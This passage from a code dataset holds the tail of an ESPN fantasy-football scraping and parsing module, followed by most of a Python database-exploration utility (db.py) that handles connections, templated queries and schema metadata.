player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
vals = [self._val(td.text) for td in tds[3:]]
for header, val in zip(headers, tds[2].text.split("/") + vals):
player[header] = val
players.append(player)
elif pos.lower() == "k":
for row in soup.findAll("tr", {"class": "pncPlayerRow"}):
player = {"source": "espn"}
tds = row.find_all("td")
# tds[0]: rank
player["source_position_rank"] = tds[0].text
# tds[1]: name/team/pos
link, navstr = list(tds[1].children)[0:2]
player["source_player_name"] = link.text
player["source_player_team"], player[
"source_player_position"
] = navstr.split()[-2:]
player["source_player_id"] = link.attrs.get("playerid")
# loop through stats
# they have attempts/completions in one column so have to remove & split
player["fantasy_points_ppr"] = self._val(tds[-1].text)
players.append(player)
else:
pass
return players
@staticmethod
def players_position(content, pos):
"""
Parses page of ESPN players by position
Args:
content:
pos:
Returns:
list: of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
class_matches = set(["oddrow", "evenrow"])
classes = set(row.attrs.get("class", []))
if class_matches.intersection(classes):
player = {"source": "espn", "source_player_position": pos}
tds = row.find_all("td")
# tds[0]: <a href="http://www.espn.com/nfl/player/_/id/
# 2574511/brandon-allen"><NAME></a>
player["source_player_name"] = tds[0].text
link = row.find("a", {"href": re.compile(r"/player/_/")})
if link:
match = re.search(r"\/id\/([0-9]+)", link["href"])
if match:
player["source_player_id"] = match.group(1)
# tds[1]: <td><a href="http://www.espn.com/nfl/team/_/
# name/jax/jacksonville-jaguars"><NAME></a></td>
player["source_team_name"] = tds[1].text
link = row.find("a", {"href": re.compile(r"/team/_/name")})
if link:
match = re.search(r"name/(\w+)/", link["href"])
if match:
player["source_team_code"] = match.group(1)
# tds[2]: <td>Arkansas</td>
player["college"] = tds[2].text
# add to list
players.append(player)
return players
@staticmethod
def team_roster(content):
"""
Parses team roster page into list of player dict
Args:
content: HTML of espn nfl team roster page
Returns:
list of dict
"""
players = []
soup = BeautifulSoup(content, "lxml")
for row in soup.find_all("tr"):
link = row.find("a", {"href": re.compile(r"/nfl/player/_/id/")})
try:
player = {"source": "espn"}
tds = row.find_all("td")
if len(tds) != 8:
continue
player["source_player_position"] = tds[2].text
player["source_player_name"] = link.text
player["source_player_id"] = link["href"].split("/")[-2]
players.append(player)
except ValueError:
pass
return players
@staticmethod
def weekly_scoring(content):
"""
Parses weekly scoring page
Args:
content (str): HTML
Returns:
list: of dict
"""
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_dst(content):
"""
Parses weekly scoring page for dst
Args:
content(str): HTML
Returns:
list: of dict
"""
# TODO: adapt for dst
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
@staticmethod
def weekly_scoring_k(content):
"""
Parses weekly scoring page for kickers
Args:
content (str): HTML
Returns:
list: of dict
"""
# TODO: adapt for kicker
results = []
headers = [
"c_a",
"pass_yds",
"pass_td",
"pass_int",
"rush_att",
"rush_yds",
"rush_td",
"rec_rec",
"rec_yds",
"rec_td",
"rec_tar",
"tpc",
"fumble",
"misc_td",
"fpts",
]
soup = BeautifulSoup(content, "lxml")
tbl = soup.select("table#playertable_0")[0]
for row in tbl.find_all("tr", {"id": re.compile(r"plyr")}):
tds = [td.text for td in row.find_all("td", class_="playertableStat")]
if tds:
player = dict(zip(headers, tds))
# name, team, position
nametd = row.find("td", {"id": re.compile(r"playername")})
for child in nametd.children:
if isinstance(child, NavigableString):
player["source_player_team"], player[
"source_player_position"
] = child.string.split()[1:3]
elif isinstance(child, Tag):
player["source_player_name"] = child.string
player["source_player_id"] = child.attrs.get("playerid")
results.append(player)
return results
class Agent:
"""
Combines common scraping/parsing tasks
"""
def __init__(self, scraper=None, parser=None, cache_name="espn-agent"):
"""
Creates Agent object
Args:
scraper(espn.Scraper): default None
parser(espn.Parser): default None
cache_name(str): default 'espn-agent'
"""
logging.getLogger(__name__).addHandler(logging.NullHandler())
if scraper:
self._s = scraper
else:
self._s = Scraper(cache_name=cache_name)
if parser:
self._p = parser
else:
self._p = Parser()
def adp(self, season_year):
"""
Gets season ADP data
Args:
season_year(int): 2018, 2019, etc.
Returns:
list: of dict
"""
content = self._s.adp(season_year)
return self._p.adp(content)
class Xref(Site):
"""
Cross-reference source players with other names/ids
"""
def __init__(self, source_name="espn"):
"""
Args:
source_name(str): either 'espn' or 'espn_fantasy'
"""
super().__init__()
self.source_name = source_name
if __name__ == "__main__":
pass
| 3.15625 | 3 |
IronManFly/storage/db/db.py | leepand/IronManFly | 599 | 12797505 |
import threading
import glob
import gzip
try:
from StringIO import StringIO # Python 2.7
except:
from io import StringIO # Python 3.3+
import uuid
import re
import os
import sys
from collections import defaultdict
import pandas as pd
import pybars
from .column import Column, ColumnSet
from .table import Table, TableSet
from .s3 import S3
from .utils import profile_path, load_profile, load_from_json, dump_to_json
from .query_templates import query_templates
# attempt to import the relevant database libraries
# TODO: maybe add warnings?
try:
import psycopg2 as pg
HAS_PG = True
except ImportError:
HAS_PG = False
try:
import MySQLdb
mysql_connect = MySQLdb.connect
HAS_MYSQL = True
except ImportError:
try:
import pymysql
mysql_connect = pymysql.connect
HAS_MYSQL = True
except ImportError:
HAS_MYSQL = False
try:
import sqlite3 as sqlite
HAS_SQLITE = True
except ImportError:
HAS_SQLITE = False
try:
import pyodbc as pyo
HAS_ODBC = True
except ImportError:
try:
import pypyodbc as pyo
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
try:
import pymssql
HAS_PYMSSQL = True
except ImportError:
HAS_PYMSSQL = False
DBPY_PROFILE_ID = ".db.py_"
S3_PROFILE_ID = ".db.py_s3_"
class DB(object):
"""
Utility for exploring and querying a database.
Parameters
----------
username: str
Your username for the database
password: str
Your password for the database
hostname: str
Hostname your database is running on (i.e. "localhost", "10.20.1.248")
port: int
Port the database is running on. defaults to default port for db.
        postgres: 5432
redshift: 5439
mysql: 3306
sqlite: n/a
mssql: 1433
filename: str
path to sqlite database
dbname: str
Name of the database
schemas: list
List of schemas to include. Defaults to all.
profile: str
Preconfigured database credentials / profile for how you like your queries
exclude_system_tables: bool
Whether or not to include "system" tables (the ones that the database needs
in order to operate). This includes things like schema definitions. Most of
you probably don't need this, but if you're a db admin you might actually
want to query the system tables.
limit: int, None
Default number of records to return in a query. This is used by the DB.query
method. You can override it by adding limit={X} to the `query` method, or
by passing an argument to `DB()`. None indicates that there will be no
limit (That's right, you'll be limitless. Bradley Cooper style.)
keys_per_column: int, None
Default number of keys to display in the foreign and reference keys.
This is used to control the rendering of PrettyTable a bit. None means
that you'll have verrrrrrrry wide columns in some cases.
driver: str, None
Driver for mssql/pyodbc connections.
Examples
--------
db = DB(dbname="AdventureWorks2012", dbtype="mssql", driver="{FreeTDS}")
from db import DB
try:
__import__('imp').find_module('psycopg2')
db = DB(username="kermit", password="<PASSWORD>", hostname="themuppets.com", port=5432, dbname="muppets", dbtype="postgres")
db = DB(username="dev", hostname="localhost", port=5432, dbname="devdb", dbtype="postgres")
db = DB(username="fozzybear", password="<PASSWORD>", hostname="ec2.523.24.131", port=5432, dbname="muppets_redshift", dbtype="redshift")
except ImportError:
pass
try:
__import__('imp').find_module('pymysql')
db = DB(username="root", hostname="localhost", dbname="employees", dbtype="mysql")
db = DB(filename="/path/to/mydb.sqlite", dbtype="sqlite")
except ImportError:
pass
"""
    def __init__(self, username=None, password=None, hostname="localhost",
port=None, filename=None, dbname=None, dbtype=None, schemas=None,
profile="default", exclude_system_tables=True, limit=1000,
keys_per_column=None, driver=None, cache=False):
if port is None:
if dbtype=="postgres":
port = 5432
elif dbtype=="redshift":
port = 5439
elif dbtype=="mysql":
port = 3306
elif dbtype=="sqlite":
port = None
elif dbtype=="mssql":
port = 1433
elif profile is not None:
pass
else:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._use_cache = cache
if dbtype not in ("sqlite", "mssql") and username is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
elif dbtype=="sqlite" and filename is None:
self.load_credentials(profile)
if cache:
self._metadata_cache = self.load_metadata(profile)
else:
self.username = username
self.password = password
self.hostname = hostname
self.port = port
self.filename = filename
self.dbname = dbname
self.dbtype = dbtype
self.schemas = schemas
self.limit = limit
self.keys_per_column = keys_per_column
self.driver = driver
if self.dbtype is None:
raise Exception("Database type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift")
self._query_templates = query_templates.get(self.dbtype).queries
if self.dbtype=="postgres" or self.dbtype=="redshift":
if not HAS_PG:
raise Exception("Couldn't find psycopg2 library. Please ensure it is installed")
self.con = pg.connect(user=self.username, password=self.password,
host=self.hostname, port=self.port, dbname=self.dbname)
self.con.autocommit = True
self.cur = self.con.cursor()
elif self.dbtype=="sqlite":
if not HAS_SQLITE:
raise Exception("Couldn't find sqlite library. Please ensure it is installed")
self.con = sqlite.connect(self.filename)
self.cur = self.con.cursor()
self._create_sqlite_metatable()
elif self.dbtype=="mysql":
if not HAS_MYSQL:
raise Exception("Couldn't find MySQLdb or pymysql library. Please ensure it is installed")
creds = {}
for arg in ["username", "password", "hostname", "port", "dbname"]:
if getattr(self, arg):
value = getattr(self, arg)
if arg=="username":
arg = "user"
elif arg=="password":
arg = "<PASSWORD>"
elif arg=="dbname":
arg = "db"
elif arg=="hostname":
arg = "host"
creds[arg] = value
self.con = mysql_connect(**creds)
self.con.autocommit(True)
self.cur = self.con.cursor()
elif self.dbtype=="mssql":
if not HAS_ODBC and not HAS_PYMSSQL:
raise Exception("Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed")
if HAS_ODBC:
base_con = "Driver={driver};Server={server};Database={database};".format(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
database=self.dbname or ''
)
conn_str = ((self.username and self.password) and "{}{}".format(
base_con,
"User Id={username};Password={password};".format(
username=self.username,
password=self.password
)
) or "{}{}".format(base_con, "Trusted_Connection=Yes;"))
try:
self.con = pyo.connect(conn_str)
self.cur = self.con.cursor()
except:
self.con = pyo.connect(
driver=self.driver or "SQL Server",
server=self.hostname or "localhost",
port=self.port,
database=self.dbname or '',
uid=self.username,
                        pwd=self.password)
self.cur = self.con.cursor()
elif HAS_PYMSSQL:
if '\\' in self.hostname:
hostname = self.hostname
elif hasattr(self, 'port'):
hostname = '{0}:{1}'.format(self.hostname, self.port)
else:
hostname = self.hostname
self.con = pymssql.connect(host=hostname,
user=self.username,
                                           password=self.password,
database=self.dbname)
self.cur = self.con.cursor()
self._tables = TableSet([])
self._exclude_system_tables = exclude_system_tables
self.handlebars = pybars.Compiler()
@property
def tables(self):
"""A lazy loaded reference to the table metadata for the DB."""
if len(self._tables) == 0:
self.refresh_schema(self._exclude_system_tables, self._use_cache)
return self._tables
def __str__(self):
return "DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}".format(
dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)
def __repr__(self):
return self.__str__()
def __delete__(self):
del self.cur
del self.con
def load_credentials(self, profile="default"):
"""
        Loads credentials for a given profile. Profiles are stored in
~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not
        to say this is a secure way to store sensitive data, but it will probably
stop your little sister from stealing your passwords.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
"""
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
creds = load_from_json(f)
self.username = creds.get('username')
self.password = creds.get('password')
self.hostname = creds.get('hostname')
self.port = creds.get('port')
self.filename = creds.get('filename')
self.dbname = creds.get('dbname')
self.dbtype = creds.get('dbtype')
self.schemas = creds.get('schemas')
self.limit = creds.get('limit')
self.keys_per_column = creds.get('keys_per_column')
else:
raise Exception("Credentials not configured!")
def save_credentials(self, profile="default"):
"""
Save your database credentials so you don't have to save them in script.
Parameters
----------
profile: str
(optional) identifier/name for your database (i.e. "dw", "prod")
from db import DB
import pymysql
db = DB(username="hank", password="<PASSWORD>", hostname="prod.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="production")
db = DB(username="hank", password="<PASSWORD>", hostname="staging.mardukas.com", dbname="bar", dbtype="mysql")
db.save_credentials(profile="staging")
db = DB(profile="staging")
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.save_credentials(profile='test')
"""
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.credentials)
@staticmethod
def load_metadata(profile="default"):
f = profile_path(DBPY_PROFILE_ID, profile)
if f:
prof = load_from_json(f)
return prof.get('tables', None)
def save_metadata(self, profile="default"):
"""Save the database credentials, plus the database properties to your db.py profile."""
if len(self.tables) > 0:
f = profile_path(DBPY_PROFILE_ID, profile)
dump_to_json(f, self.to_dict())
@property
def credentials(self):
"""Dict representation of all credentials for the database."""
if self.filename:
db_filename = os.path.join(os.getcwd(), self.filename)
else:
db_filename = None
return {
"username": self.username,
"password": self.password,
"hostname": self.hostname,
"port": self.port,
"filename": db_filename,
"dbname": self.dbname,
"dbtype": self.dbtype,
"schemas": self.schemas,
"limit": self.limit,
"keys_per_column": self.keys_per_column,
}
def find_table(self, search):
"""
        Aggressively search through your database's schema for a table.
Parameters
-----------
search: str
glob pattern for what you're looking for
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> db.find_table("A*")
+--------+--------------------------+
| Table | Columns |
+--------+--------------------------+
| Album | AlbumId, Title, ArtistId |
| Artist | ArtistId, Name |
+--------+--------------------------+
>>> results = db.find_table("tmp*") # returns all tables prefixed w/ tmp
>>> results = db.find_table("prod_*") # returns all tables prefixed w/ prod_
>>> results = db.find_table("*Invoice*") # returns all tables containing trans
>>> results = db.find_table("*") # returns everything
"""
tables = []
for table in self.tables:
if glob.fnmatch.fnmatch(table.name, search):
tables.append(table)
return TableSet(tables)
def find_column(self, search, data_type=None):
"""
        Aggressively search through your database's schema for a column.
Parameters
-----------
search: str
glob pattern for what you're looking for
data_type: str, list
(optional) specify which data type(s) you want to return
Examples
----------
>>> from db import DemoDB
>>> db = DemoDB()
>>> len(db.find_column("Name").columns)
5
>>> len(db.find_column("*Id").columns)
20
>>> len(db.find_column("*Address*").columns)
3
>>> len(db.find_column("*Address*", data_type="NVARCHAR(70)").columns)
3
>>> len(db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]).columns)
17
-= Should sort in some way for all those doctests to be viable...
-= if not, there's always a random issue where rows are not in the same order, making doctest fail.
db.find_column("Name") # returns all columns named "Name"
+-----------+-------------+---------------+
| Table | Column Name | Type |
+-----------+-------------+---------------+
| Artist | Name | NVARCHAR(120) |
| Genre | Name | NVARCHAR(120) |
| MediaType | Name | NVARCHAR(120) |
| Playlist | Name | NVARCHAR(120) |
| Track | Name | NVARCHAR(200) |
+-----------+-------------+---------------+
db.find_column("*Id") # returns all columns ending w/ Id
+---------------+---------------+---------+
| Table | Column Name | Type |
+---------------+---------------+---------+
| Album | AlbumId | INTEGER |
| Album | ArtistId | INTEGER |
| Artist | ArtistId | INTEGER |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | EmployeeId | INTEGER |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| InvoiceLine | TrackId | INTEGER |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Playlist | PlaylistId | INTEGER |
| PlaylistTrack | TrackId | INTEGER |
| PlaylistTrack | PlaylistId | INTEGER |
| Track | TrackId | INTEGER |
| Track | AlbumId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | GenreId | INTEGER |
+---------------+---------------+---------+
db.find_column("*Address*") # returns all columns containing Address
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*Address*", data_type="NVARCHAR(70)") # returns all columns containing Address that are varchars
+----------+----------------+--------------+
| Table | Column Name | Type |
+----------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Employee | Address | NVARCHAR(70) |
| Invoice | BillingAddress | NVARCHAR(70) |
+----------+----------------+--------------+
db.find_column("*e*", data_type=["NVARCHAR(70)", "INTEGER"]) # returns all columns have an "e" and are NVARCHAR(70)S or INTEGERS
+-------------+----------------+--------------+
| Table | Column Name | Type |
+-------------+----------------+--------------+
| Customer | Address | NVARCHAR(70) |
| Customer | SupportRepId | INTEGER |
| Customer | CustomerId | INTEGER |
| Employee | ReportsTo | INTEGER |
| Employee | EmployeeId | INTEGER |
| Employee | Address | NVARCHAR(70) |
| Genre | GenreId | INTEGER |
| Invoice | InvoiceId | INTEGER |
| Invoice | CustomerId | INTEGER |
| Invoice | BillingAddress | NVARCHAR(70) |
| InvoiceLine | InvoiceLineId | INTEGER |
| InvoiceLine | InvoiceId | INTEGER |
| MediaType | MediaTypeId | INTEGER |
| Track | MediaTypeId | INTEGER |
| Track | Milliseconds | INTEGER |
| Track | GenreId | INTEGER |
| Track | Bytes | INTEGER |
+-------------+----------------+--------------+
"""
if isinstance(data_type, str):
data_type = [data_type]
cols = []
for table in self.tables:
for col in vars(table):
if glob.fnmatch.fnmatch(col, search):
if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:
continue
if isinstance(getattr(table, col), Column):
cols.append(getattr(table, col))
return ColumnSet(cols)
def _assign_limit(self, q, limit=1000):
# postgres, mysql, & sqlite
if self.dbtype in ["postgres", "redshift", "sqlite", "mysql"]:
if limit:
q = q.rstrip().rstrip(";")
q = "select * from ({q}) q limit {limit}".format(q=q, limit=limit)
return q
# mssql
else:
if limit:
q = "select top {limit} * from ({q}) q".format(limit=limit, q=q)
return q
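
    # Hedged illustration (added): in the postgres/redshift/sqlite/mysql
    # branch, "select * from Track" with limit=10 becomes
    #     select * from (select * from Track) q limit 10
    # while the mssql branch instead produces
    #     select top 10 * from (select * from Track) q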
def _apply_handlebars(self, q, data, union=True):
if (sys.version_info < (3, 0)):
q = unicode(q)
template = self.handlebars.compile(q)
if isinstance(data, list):
query = [template(item) for item in data]
query = [str(item) for item in query]
if union==True:
query = "\nUNION ALL".join(query)
else:
query = "\n".join(query)
elif isinstance(data, dict):
query = template(data)
query = str(query)
else:
return q
return query
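
    # Hedged sketch (added): given the template "select count(*) from {{ t }}"
    # and data=[{"t": "Album"}, {"t": "Track"}], union=True renders one query
    # per dict and joins the results with "\nUNION ALL" into a single
    # statement, which is why such calls return one combined data frame.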
def query(self, q, data=None, union=True, limit=None):
"""
Query your database with a raw string.
Parameters
----------
q: str
Query string to execute
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
union: bool
Whether or not "UNION ALL" handlebars templates. This will return
any handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
db.query("select * from Track").head(2)
TrackId Name AlbumId MediaTypeId \\\r
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
<BLANKLINE>
GenreId Composer Milliseconds Bytes \\\r
0 1 <NAME>, <NAME>, <NAME> 343719 11170334
1 1 None 342562 5510424
<BLANKLINE>
UnitPrice
0 0.99
1 0.99
db.query("select * from Track", limit=10)
TrackId Name AlbumId MediaTypeId \
0 1 For Those About To Rock (We Salute You) 1 1
1 2 Balls to the Wall 2 2
2 3 Fast As a Shark 3 2
3 4 Restless and Wild 3 2
4 5 Princess of the Dawn 3 2
5 6 Put The Finger On You 1 1
6 7 Let's Get It Up 1 1
7 8 Inject The Venom 1 1
8 9 Snowballed 1 1
9 10 Evil Walks 1 1
GenreId Composer Milliseconds \
0 1 <NAME>, <NAME>, <NAME> 343719
1 1 None 342562
2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619
3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051
4 1 Deaffy & R.A. Smith-Diesel 375418
5 1 <NAME>, <NAME>, <NAME> 205662
6 1 <NAME>, <NAME>, <NAME> 233926
7 1 <NAME>, <NAME>, <NAME> 210834
8 1 <NAME>, <NAME>, <NAME> 203102
9 1 <NAME>, <NAME>, <NAME> 263497
Bytes UnitPrice
0 11170334 0.99
1 5510424 0.99
2 3990994 0.99
3 4331779 0.99
4 6290521 0.99
5 6713451 0.99
6 7636561 0.99
7 6852860 0.99
8 6599424 0.99
9 8611245 0.99
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> len(db.query(q))
3503
db.query(q, limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
>>> template = '''
... SELECT
... '{{ name }}' as table_name,
... COUNT(*) as cnt
... FROM
... {{ name }}
... GROUP BY
... table_name
... '''
>>> data = [
... {"name": "Album"},
... {"name": "Artist"},
... {"name": "Track"}
... ]
>>>
        db.query(template, data=data)
table_name cnt
0 Album 347
1 Artist 275
2 Track 3503
>>> q = '''
... SELECT
... {{#cols}}
... {{#if @last}}
... {{ . }}
... {{else}}
... {{ . }} ,
... {{/if}}
... {{/cols}}
... FROM
... Album;
... '''
>>> data = {"cols": ["AlbumId", "Title", "ArtistId"]}
>>> len(db.query(q, data=data, union=False))
347
db.query(q, data=data, union=False)
AlbumId Title ArtistId
0 1 For Those About To Rock We Salute You 1
1 2 Balls to the Wall 2
2 3 Restless and Wild 2
3 4 Let There Be Rock 1
4 5 Big Ones 3
"""
if data:
q = self._apply_handlebars(q, data, union)
if limit:
q = self._assign_limit(q, limit)
return pd.read_sql(q, self.con)
def query_from_file(self, filename, data=None, union=True, limit=None):
"""
Query your database from a file.
Parameters
----------
filename: str
A SQL script
data: list, dict
Optional argument for handlebars-queries. Data will be passed to the
template and rendered using handlebars.
        union: bool
            Whether or not to "UNION ALL" the rendered handlebars templates,
            returning all handlebars queries as a single data frame.
limit: int
Number of records to return
Examples
--------
>>> from db import DemoDB
>>> db = DemoDB()
>>> q = '''
... SELECT
... a.Title,
... t.Name,
... t.UnitPrice
... FROM
... Album a
... INNER JOIN
... Track t
... on a.AlbumId = t.AlbumId;
... '''
>>> with open("db/tests/myscript.sql", "w") as f:
... f.write(q)
109
>>> len(db.query_from_file("db/tests/myscript.sql", limit=10))
10
db.query_from_file("db/tests/myscript.sql", limit=10)
Title \
0 For Those About To Rock We Salute You
1 Balls to the Wall
2 Restless and Wild
3 Restless and Wild
4 Restless and Wild
5 For Those About To Rock We Salute You
6 For Those About To Rock We Salute You
7 For Those About To Rock We Salute You
8 For Those About To Rock We Salute You
9 For Those About To Rock We Salute You
Name UnitPrice
0 For Those About To Rock (We Salute You) 0.99
1 Balls to the Wall 0.99
2 Fast As a Shark 0.99
3 Restless and Wild 0.99
4 Princess of the Dawn 0.99
5 Put The Finger On You 0.99
6 Let's Get It Up 0.99
7 Inject The Venom 0.99
8 Snowballed 0.99
9 Evil Walks 0.99
"""
with open(filename) as fp:
q = fp.read()
return self.query(q, data=data, union=union, limit=limit)
def _create_sqlite_metatable(self):
"""
SQLite doesn't come with any metatables (at least ones that fit into our
framework), so we're going to create them.
"""
sys.stderr.write("Indexing schema. This will take a second...")
rows_to_insert = []
tables = [row[0] for row in self.cur.execute("select name from sqlite_master where type='table';")]
for table in tables:
for row in self.cur.execute("pragma table_info('{0}')".format(table)):
rows_to_insert.append((table, row[1], row[2]))
        # temp table used to look up table and column names
self.cur.execute("drop table if exists tmp_dbpy_schema;")
self.cur.execute("create temp table tmp_dbpy_schema(table_name varchar, column_name varchar, data_type varchar);")
for row in rows_to_insert:
self.cur.execute("insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');".format(*row))
self.cur.execute("SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';")
# find for foreign keys
self.cur.execute("drop table if exists tmp_dbpy_foreign_keys;")
self.cur.execute("create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);")
foreign_keys = []
self.cur.execute("SELECT name, sql FROM sqlite_master ;")
for (table_name, sql) in self.cur:
rgx = "FOREIGN KEY \(\[(.*)\]\) REFERENCES \[(.*)\] \(\[(.*)\]\)"
if sql is None:
continue
for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql):
foreign_keys.append((table_name, column_name, foreign_table, foreign_key))
for row in foreign_keys:
sql_insert = "insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');"
self.cur.execute(sql_insert.format(*row))
self.con.commit()
sys.stderr.write("finished!\n")
def refresh_schema(self, exclude_system_tables=True, use_cache=False):
"""
Pulls your database's schema again and looks for any new tables and
columns.
"""
col_meta, table_meta = self._get_db_metadata(exclude_system_tables, use_cache)
tables = self._gen_tables_from_col_tuples(col_meta)
# Three modes for refreshing schema
# 1. load directly from cache
# 2. use a single query for getting all key relationships
# 3. use the naive approach
if use_cache:
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_meta[t]['foreign_keys']['columns'],
ref_keys=table_meta[t]['ref_keys']['columns'])
for t in sorted(tables.keys())])
# optimize the foreign/ref key query by doing it one time, database-wide, if query is available
elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):
self.cur.execute(self._query_templates['system']['foreign_keys_for_db'])
table_db_foreign_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_foreign_keys[rel[1]].append(rel)
self.cur.execute(self._query_templates['system']['ref_keys_for_db'])
table_db_ref_keys = defaultdict(list)
for rel in self.cur:
# second value in relationship tuple is the table name
table_db_ref_keys[rel[1]].append(rel)
# generate our Tables, and load them into a TableSet
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column,
foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t])
for t in sorted(tables.keys())])
elif not use_cache:
self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t],
keys_per_column=self.keys_per_column) for t in sorted(tables.keys())])
sys.stderr.write("done!\n")
def _get_db_metadata(self, exclude_system_tables, use_cache):
col_meta = []
table_meta = {}
# pull out column metadata for all tables as list of tuples if told to use cached metadata
if use_cache and self._metadata_cache:
sys.stderr.write("Loading cached metadata. Please wait...")
for table in self._metadata_cache:
# table metadata
table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')}
# col metadata: format as list of tuples, to match how normal loading is performed
for col in table['columns']:
col_meta.append((col['schema'], col['table'], col['name'], col['type']))
else:
sys.stderr.write("Refreshing schema. Please wait...")
if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \
self._query_templates['system']:
schemas_str = ','.join([repr(schema) for schema in self.schemas])
q = self._query_templates['system']['schema_specified'] % schemas_str
elif exclude_system_tables:
q = self._query_templates['system']['schema_no_system']
else:
q = self._query_templates['system']['schema_with_system']
self.cur.execute(q)
col_meta = self.cur
return col_meta, table_meta
def _gen_tables_from_col_tuples(self, cols):
tables = {}
# generate our Columns, and attach to each table to the table name in dict
for (table_schema, table_name, column_name, data_type) in cols:
if table_name not in tables:
tables[table_name] = []
tables[table_name].append(Column(self.con, self._query_templates, table_schema,
table_name, column_name, data_type, self.keys_per_column))
return tables
def _try_command(self, cmd):
try:
self.cur.execute(cmd)
except Exception as e:
print ("Error executing command:")
print ("\t '{0}'".format(cmd))
print ("Exception: {0}".format(e))
self.con.rollback()
def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,
